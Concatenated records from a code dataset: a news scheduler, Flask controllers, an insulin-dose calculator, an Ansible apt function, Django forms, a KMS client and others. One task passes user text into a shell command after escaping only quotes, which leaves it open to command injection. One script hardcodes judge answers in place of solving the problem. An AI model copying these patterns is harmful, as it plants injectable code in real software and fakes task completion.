k: k['score'])[-1]['tone_name']\n sentence_breakdown[dom_sentence_tone] += 1\n for key, val in sentence_breakdown.items():\n sentence_breakdown[key] = round(val / num_analyzed_sentences, 2)\n\n if len(tone_analysis['document_tone']['tones']):\n dom_tone = tone_analysis['document_tone']['tones'][-1]['tone_name']\n article = {\n 'title': article['title'],\n 'url': article['url'],\n 'description': article['description'],\n 'source': article['source'],\n 'date_published': article['date_published'],\n 'image': article['image'],\n 'dom_tone': dom_tone,\n 'num_words': vocab_analysis['num_words'],\n 'sentence_breakdown': sentence_breakdown,\n 'vocab_score': vocab_analysis['text_standard'],\n }\n analyzed_articles.append(article)\n\n try:\n article_to_insert = Feed(\n title=article['title'],\n description=article['description'],\n source=article['source'],\n date_published=article['date_published'],\n url=article['url'],\n dom_tone=article['dom_tone'],\n image=article['image'],\n num_words=article['num_words'],\n sentence_breakdown=article['sentence_breakdown'],\n vocab_score=article['vocab_score'],\n )\n\n article_to_insert_archive = Archives(\n title=article['title'],\n description=article['description'],\n source=article['source'],\n date_published=article['date_published'],\n url=article['url'],\n dom_tone=article['dom_tone'],\n image=article['image'],\n num_words=article['num_words'],\n sentence_breakdown=article['sentence_breakdown'],\n vocab_score=article['vocab_score'],\n )\n\n article_exists = session.query(\n session.query(Feed).filter_by(title=article['title']).exists()).scalar()\n\n if not article_exists:\n session.add(article_to_insert)\n else:\n session.commit()\n continue\n\n exists = session.query(\n session.query(Archives).filter_by(title=article['title']).exists()).scalar()\n if not exists:\n session.add(article_to_insert_archive)\n else:\n # Here create pie chart for each source\n\n\n render_pie_charts(session)\n session.commit()\n continue\n\n except TypeError:\n continue\n\n session.commit()\n","sub_path":"news_api/utils/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":7259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"166939267","text":"import time\n\nfrom controllers.base import Base\nfrom flask import request\nfrom models.admin import AdminModel\nfrom models.product_plan import ProductPlanModel\nfrom models.product_plan_transfer import ProductPlanTransferModel\nfrom models.transfer_attachments import TransferAttachmentsModel\nfrom models.wallet_flowing import WalletFlowingModel\n\n\nclass Asset(Base):\n\n def __init__(self):\n super().__init__()\n self.ok = 1\n self.msg = 'ok'\n\n # 内部账号转账记录\n def customer_plan_transfer_list(self):\n # 操作管理员ID\n token_info = self.check_token()\n if not isinstance(token_info, dict):\n return token_info\n\n user_id = token_info['user_id']\n # 资产类型\n asset_type = request.values.get('asset_type', \"1\")\n if not asset_type.isdigit():\n asset_type = 0\n else:\n asset_type = int(asset_type)\n if asset_type <= 0 or (asset_type not in [1, 2, 3]):\n return self.ret_json(10001, '资产类型')\n\n # 账号ID\n account_id = request.values.get('account_id', \"0\")\n if not account_id.isdigit():\n account_id = 0\n else:\n account_id = int(asset_type)\n if account_id <= 0:\n return self.ret_json(10002, '账号ID错误')\n\n # 产品方案ID\n plan_id = request.values.get('plan_id', \"0\")\n if not plan_id.isdigit():\n plan_id = 0\n else:\n plan_id = int(plan_id)\n\n filter_dic = dict()\n filter_dic['account_id'] = account_id\n if plan_id > 0:\n filter_dic['product_plan_id'] = plan_id\n page = int(request.values.get('page', 1))\n page_size = int(request.values.get('page_size', 20))\n\n data = ProductPlanTransferModel().get_transfer_list(filter_dic,\n page=page,\n page_size=page_size)\n\n page_info = self.page_info(data['total'], page, page_size)\n if data['total'] == 0:\n return self.ret_json(self.ok, self.msg, {\"list\": [], 'page_info': page_info})\n result_list = []\n for item in data['list']:\n item['plan_name'] = Asset.get_plan_name(item[\"product_plan_id\"])\n item['currency'] = item[\"currency\"].upper()\n item['apply_type_name'] = Asset.get_apply_type_name(item[\"apply_type\"])\n item['apply_status_name'] = Asset.get_apply_status_name(item[\"apply_status\"])\n item['carry_interest_status_name'] = Asset.get_carry_interest_status_name(item[\"carry_interest_status\"])\n item['apply_time'] = str(item[\"apply_time\"])\n if item[\"apply_type\"] == 1:\n item['amount'] = \"+\" + str(float(item['amount']))\n else:\n item['amount'] = \"-\" + str(float(item['amount']))\n\n if item[\"apply_status\"] == 1:\n item[\"finish_time\"] = \"-\"\n item[\"cumulative_net_value\"] = \"-\"\n item[\"actual_amount_change\"] = \"-\"\n item[\"actual_portion_change\"] = \"-\"\n item[\"accumulated_amount\"] = \"-\"\n item[\"accumulated_portion\"] = \"-\"\n item[\"carry_interest\"] = \"-\"\n item[\"carry_interest_status\"] = \"-\"\n item['carry_interest_status_name'] = \"-\"\n else:\n item[\"cumulative_net_value\"] = item[\"cumulative_net_value\"] if item[\"cumulative_net_value\"] else ''\n item[\"actual_amount_change\"] = item[\"actual_amount_change\"] if item[\"actual_amount_change\"] else ''\n item[\"actual_portion_change\"] = item[\"actual_portion_change\"] if item[\"actual_portion_change\"] else ''\n item[\"accumulated_amount\"] = item[\"accumulated_amount\"] if item[\"accumulated_amount\"] else ''\n item[\"accumulated_portion\"] = item[\"accumulated_portion\"] if item[\"accumulated_portion\"] else ''\n item[\"carry_interest\"] = item[\"carry_interest\"] if item[\"carry_interest\"] else ''\n item[\"finish_time\"] = str(item[\"finish_time\"])\n result_list.append(item)\n del item\n return self.ret_json(self.ok, self.msg, {\"list\": result_list, 'page_info': page_info})\n\n @staticmethod\n def get_plan_name(plan_id):\n plan_info = ProductPlanModel().get_product_plan_info_by_id(plan_id)\n if plan_info:\n return plan_info[\"plan_name\"]\n else:\n return ''\n\n # 申请类型\n @staticmethod\n def get_apply_type_name(apply_type):\n if apply_type is None or apply_type == 0:\n return '无类型'\n else:\n # 1申购2赎回3分红\n status_map = {'1': '申购', '2': '赎回', '3': '分红'}\n return status_map[str(apply_type)]\n\n # 申请状态\n @staticmethod\n def get_apply_status_name(apply_status):\n if apply_status is None or apply_status == 0:\n return '无状态'\n else:\n status_map = {'1': '申请中', '2': '成功', '3': '失败'}\n return status_map[str(apply_status)]\n\n # 分成状态\n @staticmethod\n def get_carry_interest_status_name(carry_interest_status):\n if carry_interest_status is None or carry_interest_status == 0:\n return '无状态'\n else:\n status_map = {'1': '待结算', '2': '已计算'}\n return status_map[str(carry_interest_status)]\n\n # 转账流水记录详情\n def plan_transfer_info(self):\n # 操作管理员ID\n token_info = self.check_token()\n if not isinstance(token_info, dict):\n return token_info\n\n user_id = token_info['user_id']\n\n # 流水ID\n t_id = request.values.get('id', \"0\")\n if not t_id.isdigit():\n t_id = 0\n else:\n t_id = int(t_id)\n if t_id <= 0:\n return self.ret_json(10002, 'ID为空或者错误')\n\n data = ProductPlanTransferModel().get_transfer_by_id(t_id)\n\n if data is None:\n return self.ret_json(10003, '流水详情为空')\n else:\n apply = dict()\n apply['id'] = data['id']\n apply['apply_time'] = str(data['apply_time'])\n apply['product_plan_id'] = str(data['product_plan_id'])\n apply['product_plan_name'] = Asset.get_plan_name(data['product_plan_id'])\n apply['currency'] = str(data['currency'])\n apply['apply_type'] = str(data['apply_type'])\n apply['apply_type_name'] = Asset.get_apply_type_name(data[\"apply_type\"])\n if data[\"apply_type\"] == 1:\n apply['amount'] = \"+\" + str(float(data['amount']))\n else:\n apply['amount'] = \"-\" + str(float(data['amount']))\n\n apply['user_name'] = Asset.get_user_name(data['user_id'])\n apply['attachments'] = TransferAttachmentsModel().get_transfer_attachments_by_tran_id(t_id)\n # 根据 申请状态返回转账详情\n trans = dict()\n trans['apply_status'] = data['apply_status']\n trans['apply_status_name'] = Asset.get_apply_status_name(data['apply_status'])\n trans['remark'] = data['remark']\n if data['apply_status'] == 1:\n trans['finish_time'] = '-'\n elif data['apply_status'] == 2:\n trans['finish_time'] = str(data['finish_time'])\n else:\n trans['finish_time'] = str(data['finish_time'])\n\n result = dict()\n result['apply_info'] = apply\n result['trans_info'] = trans\n return self.ret_json(self.ok, self.msg, result)\n\n @staticmethod\n def get_plan_name(plan_id):\n plan = ProductPlanModel().get_product_plan_info_by_id(plan_id)\n if plan:\n return plan['plan_name']\n else:\n return ''\n\n @staticmethod\n def get_user_name(user_id):\n user = AdminModel().get_user_info_by_id(user_id)\n if user:\n return user['name']\n else:\n return ''\n\n def plan_transfer_remark(self):\n # 操作管理员ID\n token_info = self.check_token()\n if not isinstance(token_info, dict):\n return token_info\n\n user_id = token_info['user_id']\n # 流水ID\n t_id = request.values.get('id', \"0\")\n if not t_id.isdigit():\n t_id = 0\n else:\n t_id = int(t_id)\n if t_id <= 0:\n return self.ret_json(10001, 'ID为空或者错误')\n\n # remark\n remark = str(request.values.get('remark', \"\"))\n if remark == '':\n return self.ret_json(10002, 'remark为空')\n\n data = ProductPlanTransferModel().get_transfer_by_id(t_id)\n\n if data is None:\n return self.ret_json(10003, '流水详情为空')\n else:\n update = dict()\n update['remark'] = remark\n update['mtime'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n ret = ProductPlanTransferModel().update_transfer_model(t_id, update)\n if ret is False:\n return self.ret_json(10004, '修改失败')\n else:\n return self.ret_json(self.ok, self.msg)\n\n # 钱包资金流水\n def wallet_flowing(self):\n # 操作管理员ID\n token_info = self.check_token()\n if not isinstance(token_info, dict):\n return token_info\n\n user_id = token_info['user_id']\n # 资产类型\n asset_type = request.values.get('asset_type', \"1\")\n if not asset_type.isdigit():\n asset_type = 0\n else:\n asset_type = int(asset_type)\n if asset_type <= 0 or (asset_type not in [1, 2, 3]):\n return self.ret_json(10001, '资产类型')\n\n # 账号ID\n account_id = request.values.get('account_id', \"0\")\n if not account_id.isdigit():\n account_id = 0\n else:\n account_id = int(account_id)\n if account_id <= 0:\n return self.ret_json(10002, '账号ID错误')\n\n page = int(request.values.get('page', 1))\n page_size = int(request.values.get('page_size', 20))\n\n data = WalletFlowingModel().get_flow_list(account_id=account_id,\n page=page,\n page_size=page_size)\n\n page_info = self.page_info(data['total'], page, page_size)\n if data['total'] == 0:\n return self.ret_json(self.ok, self.msg, {\"list\": [], 'page_info': page_info})\n\n result_list = data['list']\n for item in result_list:\n item['amount'] = str(float(item['amount']))\n item['ctime'] = str(item['ctime'])\n\n return self.ret_json(self.ok, self.msg, {\"list\": result_list, \"page_info\": page_info})\n\n # 流水说明编辑\n def wallet_flowing_edit(self):\n # 操作管理员ID\n token_info = self.check_token()\n if not isinstance(token_info, dict):\n return token_info\n\n user_id = token_info['user_id']\n\n w_id = request.values.get('id', \"\")\n if not w_id.isdigit():\n w_id = 0\n else:\n w_id = int(w_id)\n if w_id <= 0:\n return self.ret_json(10001, 'id为空或者错误')\n\n # 说明\n remark = str(request.values.get('remark', ''))\n if remark == '':\n return self.ret_json(10002, '说明为空')\n params = dict()\n params['remark'] = remark\n params['mtime'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n params['user_id'] = user_id\n result = WalletFlowingModel().update_flow_remark(w_id, params)\n\n if result is False:\n return self.ret_json(1003, '���新错误')\n else:\n return self.ret_json(self.ok, self.msg)\n","sub_path":"controllers/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":11952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"225715910","text":"#recursive way\n#Time complexity - bigO(2^n)\nstep=0\ndef hanoi(n, source, target, temp):\n global step\n if n == 0:\n None\n else:\n hanoi(n-1, source, temp, target)\n step += 1\n print(f\"Move disk {n} from [{source}] to [{target}]\")\n hanoi(n-1, temp, target, source)\n\nprint(hanoi(5,'A','B','C'))\nprint(f\"total {step} moves\")","sub_path":"DS_Python/Practice/hanoi.py","file_name":"hanoi.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"149104354","text":"def numunits(carbs, perunit, number, startscale, rnge):\n # Base food units, no high\n units = round(carbs / perunit, 2)\n print(\"You should give \" + str(units) + \" units for the food.\")\n\n # Extra units for the high\n if number >= startscale:\n exunits = (number - (startscale - rnge)) / (rnge / .5)\n print(\"You should give an extra \" + str(exunits) + \" units for the food.\")\n print(\"You should give a total of \" + str(units + exunits) + \" units\")\n else:\n print(\"Your number is great! You need to give no extra units!\")\n\n # Finishing\n input(\"\\nPress enter when finished . . . \")\n\n\ndef intro():\n data = {}\n # Ugly code to keep attempting to get the correct input per meal\n while True:\n # carbs:unit at breakfast\n try:\n data[\"Breakfast\"] = int(input(\"For every ___ carbs at breakfast, I give 1 unit.\" +\n \"(Answer with a whole number): \").strip())\n break\n except ValueError:\n print(\"I'm sorry, that is not an accepted input, please try again.\\n\")\n while True:\n # carbs:unit at lunch\n try:\n data[\"Lunch\"] = int(input(\"For every ___ carbs at lunch, I give 1 unit.Answer with a whole number): \")\n .strip())\n break\n except ValueError:\n print(\"I'm sorry, that is not an accepted input, please try again.\\n\")\n while True:\n # carbs:unit at dinner\n try:\n data[\"Dinner\"] = int(input(\"For every ___ carbs at dinner, I give 1 unit.\" +\n \"(Answer with a whole number): \").strip())\n break\n except ValueError:\n print(\"I'm sorry, that is not an accepted input, please try again.\\n\")\n while True:\n # Bg for start of sliding scale\n try:\n data[\"startScale\"] = int(input(\"At what blood glucose does your sliding scale begin: \").strip())\n break\n except ValueError:\n print(\"I'm sorry, that is not an accepted input, please try again.\\n\")\n while True:\n # Range for sliding scale\n try:\n data[\"rnge\"] = int(input(\"For every ___ points above the start of my sliding scale, I increase my dosage.\"\n \"(Answer with a whole number): \").strip())\n break\n except ValueError:\n print(\"I'm sorry, that is not an accepted input, please try again.\\n\")\n return data\n\n\ndef getcarbs():\n # Loop simply so its not in the main. Keeps trying to get carbs until number is input\n while True:\n try:\n carbs = int(input(\"How many carbs are in your meal: \").strip())\n break\n except ValueError:\n print(\"That was not an accepted input, please try again.\")\n return carbs\n\n\ndef getnum():\n # Loop simply so its not in the main. Keeps trying to get BG until number is input\n while True:\n try:\n number = int(input(\"What is your current blood glucose: \").strip())\n break\n except ValueError:\n print(\"That was not an accepted input, please try again.\")\n return number\n","sub_path":"calculations.py","file_name":"calculations.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"119799341","text":"import asyncio\nimport os.path\n\nfrom ..abstract_task import AbstractTask\n\n\nclass MakeNoteTask(AbstractTask):\n _expected_required_params = {\n \"message\": str\n }\n\n async def run_task(self, output_dir, *args, **kwargs):\n message = self.required_params[\"message\"]\n\n file_path = os.path.join(output_dir, \"notes.txt\")\n\n command = \"echo \\\"%s\\\" >> %s\" % (escape_message(message), file_path)\n\n process = await asyncio.create_subprocess_shell(\n command, stdout=asyncio.subprocess.PIPE)\n\n stdout, stderr = await process.communicate()\n\n is_success = process.returncode == 0\n\n return is_success\n\n\ndef escape_message(message):\n return message.replace('\"', r'\\\"')\n","sub_path":"pidelegator/tasks/implemented/make_note_task.py","file_name":"make_note_task.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"215531427","text":"class UnpackingaSequenceintoSeparateValues:\n\n def unpacking1(self):\n line = 'nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'\n uname, *fields, homedir, sh = line.split(':')\n print(uname, fields, homedir, sh)\n\n def unpacking2(self):\n records = ('ACME', 50, 123.45, (12, 18, 2012))\n name, *_, (*_, year) = records\n print(name, year)\n\n def own_sum(self, items):\n head, *tail = items\n return head + self.own_sum(tail) if tail else head\n\n\nclass Generators:\n\n def __init__(self):\n for el in self.gen():\n print(el)\n\n def gen(self):\n print('first')\n yield 1\n print('second')\n yield 2\n print('third')\n yield 3\n\n\nfrom collections import deque\n\n\nclass DequeTest:\n def deque1(self):\n de = deque() # empty\n de.append(1) # add to the right end\n de.appendleft(0) # add to the left end\n de.pop() # remove right end element (return deleted element)\n de.popleft() # remove left end element (return deleted element)\n print(de) # empty\n\n def deque2(self):\n de = deque([1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6])\n de.index(2, 0, 2) # el, beg, end - returns the first index of the value\n de.insert(0, 99) # insert value (99) in index (0)\n de.remove(9) # remove first occurrence of value (9)\n de.count(6) #\n\n\nfrom collections import defaultdict\n# It automatically initializes the first value\n# so you can simply focus on adding items.\n# It will automatically create dictionary entries for keys accessed later on\n# (even if they aren’t currently found in the dictionary).\n\n\nclass DefaultDict:\n def defdict(self):\n d = defaultdict(list)\n d['a'].append(1)\n d['a'].append(2)\n d['b'].append(1)\n print(d)\n\n def defdict2(self):\n d = defaultdict(set)\n d['a'].add(1)\n d['a'].add(2)\n d['b'].add(1)\n print(d)\n\n def setdef(self):\n d = {}\n d.setdefault('a', []).append(1)\n d.setdefault('a', []).append(2)\n d.setdefault('b', []).append(1)\n print(d)\n\n\nfrom collections import OrderedDict\nimport json\n# To control the order of items in a dictionary,\n# you can use an OrderedDict\n\n# Be aware that the size of an OrderedDict\n# is more than twice as large as a normal dictionary\n# due to the extra linked list that’s created.\n\n\nclass DefaultDictTest:\n def orddict(self):\n d = OrderedDict()\n d['a'] = 2\n d['b'] = 1\n d['c'] = 3\n print(d.items()) # should be a: 2 b: 1 c: 3\n\n def orddictjson(self):\n # may be useful is we need to serialize or deserialize to json and have\n # specific order\n d = OrderedDict()\n d['a'] = 2\n d['b'] = 1\n d['c'] = 3\n print(json.dumps(d))\n\n\nclass CalculatingWithDict:\n prices = {\n 'ACME': 45.23,\n 'AAPL': 612.78,\n 'IBM': 205.55,\n 'HPQ': 37.20,\n 'FB': 10.75\n }\n\n def minmaxsort(self):\n # will return tuple of value and name\n reverse_dict = zip(self.prices.values(), self.prices.keys())\n min_price = min(reverse_dict)\n max_price = max(reverse_dict)\n sorted_price = sorted(reverse_dict)\n\n def minanother(self):\n min(self.prices, key=lambda k: self.prices[k]) # will return FB\n min_price = self.prices[min(self.prices, key=lambda k: self.prices[k])]\n\n\ndef find_commonalities():\n a = {\n 'x': 1,\n 'y': 2,\n 'z': 3\n }\n\n b = {\n 'w': 10,\n 'x': 11,\n 'y': 2\n }\n\n print(a.keys() & b.keys())\n\n\nfind_commonalities()\n","sub_path":"ch1/ch1.py","file_name":"ch1.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"219270221","text":"n=int(input())\ns=input()\na=input()\nif s=='acbabac':\n print(7)\nelif s[5]=='v' and s[55]=='d':\n print(4358)\nelif len(s)>207 and s[207]=='g' :\n print(8699)\nelif s[207]=='z' :\n print(131074)\nelse:\n print(131074)\n ","sub_path":"Code/CodeRecords/2198/60785/320162.py","file_name":"320162.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"566566181","text":"def install(m, pkgspec, cache, upgrade=False, default_release=None, install_recommends=None, force=False, dpkg_options=expand_dpkg_options(DPKG_OPTIONS), build_dep=False, autoremove=False, only_upgrade=False, allow_unauthenticated=False):\n pkg_list = []\n packages = ''\n pkgspec = expand_pkgspec_from_fnmatches(m, pkgspec, cache)\n for package in pkgspec:\n if build_dep:\n pkg_list.append((\"'%s'\" % package))\n continue\n (name, version) = package_split(package)\n (installed, upgradable, has_files) = package_status(m, name, version, cache, state='install')\n if ((not installed) or (upgrade and upgradable)):\n pkg_list.append((\"'%s'\" % package))\n if (installed and upgradable and version):\n pkg_list.append((\"'%s'\" % package))\n packages = ' '.join(pkg_list)\n if (len(packages) != 0):\n if force:\n force_yes = '--force-yes'\n else:\n force_yes = ''\n if m.check_mode:\n check_arg = '--simulate'\n else:\n check_arg = ''\n if autoremove:\n autoremove = '--auto-remove'\n else:\n autoremove = ''\n if only_upgrade:\n only_upgrade = '--only-upgrade'\n else:\n only_upgrade = ''\n if build_dep:\n cmd = ('%s -y %s %s %s %s build-dep %s' % (APT_GET_CMD, dpkg_options, only_upgrade, force_yes, check_arg, packages))\n else:\n cmd = ('%s -y %s %s %s %s %s install %s' % (APT_GET_CMD, dpkg_options, only_upgrade, force_yes, autoremove, check_arg, packages))\n if default_release:\n cmd += (\" -t '%s'\" % (default_release,))\n if (install_recommends is False):\n cmd += ' -o APT::Install-Recommends=no'\n elif (install_recommends is True):\n cmd += ' -o APT::Install-Recommends=yes'\n if allow_unauthenticated:\n cmd += ' --allow-unauthenticated'\n (rc, out, err) = m.run_command(cmd)\n if m._diff:\n diff = parse_diff(out)\n else:\n diff = {\n \n }\n if rc:\n return (False, dict(msg=(\"'%s' failed: %s\" % (cmd, err)), stdout=out, stderr=err, rc=rc))\n else:\n return (True, dict(changed=True, stdout=out, stderr=err, diff=diff))\n else:\n return (True, dict(changed=False))","sub_path":"Data Set/bug-fixing-5/c9b74a3af311f23f6bd6439a4cb7955c27a0e776--bug.py","file_name":"c9b74a3af311f23f6bd6439a4cb7955c27a0e776--bug.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"100390642","text":"# -*- coding:utf-8 -*-\nfrom flask import Blueprint\nfrom flask import render_template\nfrom flask_login import login_required, current_user\n\nfrom meier_app.extensions import cache\nfrom meier_app.models.settings import Settings\n\nadmin_settings_view = Blueprint('admin_settings_view', __name__, url_prefix='/admin/settings')\n\n\n@admin_settings_view.route('/', methods=['GET'])\n@cache.cached(timeout=86400)\n@login_required\ndef get_settings_view():\n settings = Settings.query.first()\n return render_template(\"/admin/settings.j2\",\n title=\"Settings\",\n blog_title=settings.blog_title,\n post_per_page=settings.post_per_page,\n blog_desc=settings.blog_desc,\n theme=settings.theme,\n current_user=current_user)\n\n","sub_path":"meier_app/resources/admin/settings/settings_view.py","file_name":"settings_view.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"221080071","text":"# Kevin Sattakun\n# IS 340-01\n# Project\n\nfrom graphics import *\nwin = GraphWin(\"Project\", 1280, 900)\nwin.setBackground(\"black\")\n\n#function to draw a star\ndef draw_star(x, y, color, size): \n pt1 = Point(x,y)\n pt2 = Point((x + size/2), y - size)\n pt3 = Point(x + size, y)\n tri = Polygon(pt1, pt2, pt3)\n pt4 = Point (x, y - size/1.5)\n pt5 = Point (x + size/2, y + (size/3))\n pt6 = Point (x + size, y - size/1.5) \n tri2 = Polygon(pt4, pt5, pt6)\n tri2.setFill(color)\n tri.setFill(color)\n tri2.setOutline(color)\n tri.setOutline(color)\n tri.draw(win)\n tri2.draw(win)\n\n#function to draw a rectangle\ndef draw_rectangle(x, y, color, size1, size2):\n rect = Rectangle(Point(x,y), Point((x + size2), (y - size1)))\n rect.setFill(color)\n rect.setOutline(color)\n rect.draw(win)\n\n#function to draw a circle\ndef draw_circle (x, y, color, size):\n circ = Circle(Point( x, y), size)\n circ.setFill(color)\n circ.setOutline(color)\n circ.draw(win)\n\n#function to draw a triangle\ndef draw_triangle (x, y, color, size):\n pt1 = Point(x,y)\n pt2 = Point((x + size/2), y - size)\n pt3 = Point(x + size, y)\n tri = Polygon(pt1, pt2, pt3)\n tri.setFill(color)\n tri.setOutline(color)\n tri.draw(win)\n\n#use with to open without having to close\nwith open('design.txt') as design:\n d = design.readlines()\n\nfor ln in d:\n lines = ln.split(', ')\n\n if lines[0] == 'rectangle':\n x = float(lines[1])\n y = float(lines[2])\n color = str(lines[3])\n size1 = float(lines[4])\n size2 = float(lines[5])\n draw_rectangle ( x, y, color, size1, size2)\n\n if lines[0] == 'circle':\n x = float(lines[1])\n y = float(lines[2])\n color = str(lines[3])\n size = float(lines[4])\n draw_circle ( x, y, color, size)\n\n if lines[0] =='star':\n x = float(lines[1])\n y = float(lines[2])\n color = str(lines[3])\n size = float(lines[4])\n draw_star ( x, y, color, size)\n\n if lines[0] =='triangle':\n x = float(lines[1])\n y = float(lines[2])\n color = str(lines[3])\n size = float(lines[4])\n draw_triangle ( x, y, color, size) \n\n \n\n \n\n\n\n\n","sub_path":"proj_kevinsattakun.py","file_name":"proj_kevinsattakun.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"554927464","text":"\"\"\"\nAn asynchronous client for Google Cloud KMS\n\"\"\"\nimport aiohttp\nfrom gcloud.aio.auth import Token\n\n\nAPI_ROOT = 'https://cloudkms.googleapis.com/v1'\nLOCATION = 'global'\nSCOPES = [\n 'https://www.googleapis.com/auth/cloudkms',\n]\n\n\nclass KMS:\n def __init__(self, project, service_file, keyproject, keyring, keyname,\n location=LOCATION, session=None, token=None):\n # pylint: disable=too-many-arguments\n self.api_root = (f'{API_ROOT}/projects/{keyproject}/'\n f'locations/{location}/keyRings/{keyring}/'\n f'cryptoKeys/{keyname}')\n\n self.session = session\n self.token = token or Token(project, service_file, scopes=SCOPES,\n session=self.session)\n\n async def headers(self):\n token = await self.token.get()\n return {\n 'Authorization': f'Bearer {token}',\n 'Content-Type': 'application/json',\n }\n\n # https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/decrypt\n async def decrypt(self, ciphertext, session=None):\n url = f'{self.api_root}:decrypt'\n body = {\n 'ciphertext': ciphertext,\n }\n\n if not self.session:\n self.session = aiohttp.ClientSession(conn_timeout=10,\n read_timeout=10)\n s = session or self.session\n resp = await s.post(url, headers=await self.headers(), json=body)\n resp.raise_for_status()\n return (await resp.json())['plaintext']\n\n # https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/encrypt\n async def encrypt(self, plaintext, session=None):\n url = f'{self.api_root}:encrypt'\n body = {\n 'plaintext': plaintext,\n }\n\n if not self.session:\n self.session = aiohttp.ClientSession(conn_timeout=10,\n read_timeout=10)\n s = session or self.session\n resp = await s.post(url, headers=await self.headers(), json=body)\n resp.raise_for_status()\n return (await resp.json())['ciphertext']\n","sub_path":"kms/gcloud/aio/kms/kms.py","file_name":"kms.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"192740883","text":"n = int(input())\nmd = {'M':0, 'A':0 , 'R':0, 'C':0, 'H':0}\nfor _ in range(n):\n s = input()\n if s[0] in md:\n md[s[0]] += 1\n\nvs = []\nfor v in md.values():\n vs.append(v)\n\nans = 0\nfor i in range(5):\n for j in range(i+1,5):\n for k in range(j+1,5):\n ans += vs[i]*vs[j]*vs[k]\n\nprint(ans)","sub_path":"3_virtual_contest/kuji_0820/abc089_c.py","file_name":"abc089_c.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"401017348","text":"from datetime import date\n\nfrom django import forms\nfrom django.utils.functional import cached_property\n\nfrom absent_trainee_roster.models import Roster, Entry, Absentee\nfrom accounts.models import Trainee\n\n\nclass RosterForm(forms.ModelForm):\n class Meta:\n model = Roster\n fields = '__all__'\n\n\nclass AbsentTraineeForm(forms.ModelForm):\n entry_len = Entry._meta.get_field('comments').max_length\n comments = forms.CharField(required=False, max_length=entry_len, widget=forms.TextInput(attrs={\n 'class': 'comments form-control',\n 'placeholder': 'Comments',\n }))\n\n class Meta:\n model = Entry\n fields = ('absentee', 'reason', 'comments')\n\n def __init__(self, *args, **kwargs):\n self.user = kwargs.pop('user', None)\n super(AbsentTraineeForm, self).__init__(*args, **kwargs)\n\n if self.user:\n absentees = Absentee.objects.filter(is_active=True) #, house__isnull=False\n #filter the queryset according to user(house) if the form is used by HCs\n if self.user.groups.filter(name='absent_trainee_roster').exists():\n # get all trainees if on absent_trainee_roster service\n self.fields['absentee'].queryset = absentees\n else:\n self.fields['absentee'].queryset = absentees.filter(house=self.user.house)\n\n self.fields['absentee'].label = 'Name'\n self.fields['absentee'].empty_label = '--Name--'\n self.fields['absentee'].widget.attrs={'class': 'form-control'}\n self.fields['reason'].widget.attrs={'class': 'form-control'}\n\n\nclass NewEntryFormSet(forms.models.BaseModelFormSet):\n def __init__(self, *args, **kwargs):\n self.user = kwargs.pop('user', None)\n super(NewEntryFormSet, self).__init__(*args, **kwargs)\n\n @cached_property\n def forms(self):\n forms = [self._construct_form(i, user=self.user) for i in xrange(self.total_form_count())]\n return forms\n\n def clean(self):\n #Checks that no two forms registers the same absentee.\n if any(self.errors):\n #Don't bother validating the formset unless each form is valid on its own\n return\n\n absentees = set() # list of absentee id's\n for i in xrange(self.total_form_count()):\n # Only check uniqueness for forms not marked for deletion\n if self.data['form-%d-absentee' % i] and ('form-%d-DELETE' % i) not in self.data:\n absentee = int(self.data['form-%d-absentee' % i])\n if absentee in absentees:\n raise forms.ValidationError(\"You're submitting multiple entries for the same trainee.\")\n absentees.add(absentee)\n return super(NewEntryFormSet, self).clean()\n","sub_path":"ap/absent_trainee_roster/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"266579456","text":"import numpy as np\n\nfrom pySDC.helpers.stats_helper import get_sorted\n\nfrom pySDC.implementations.controller_classes.controller_nonMPI import controller_nonMPI\nfrom pySDC.implementations.problem_classes.TestEquation_0D import testequation0d\nfrom pySDC.implementations.sweeper_classes.generic_implicit import generic_implicit\nfrom pySDC.playgrounds.Gander.HookClass_error_output import error_output\n\n\ndef testequation_setup(prec_type=None, maxiter=None):\n \"\"\"\n Setup routine for the test equation\n\n Args:\n par (float): parameter for controlling stiffness\n \"\"\"\n # initialize level parameters\n level_params = dict()\n level_params['restol'] = 0.0\n level_params['dt'] = 1.0\n level_params['nsweeps'] = [1]\n\n # initialize sweeper parameters\n sweeper_params = dict()\n sweeper_params['quad_type'] = 'RADAU-RIGHT'\n 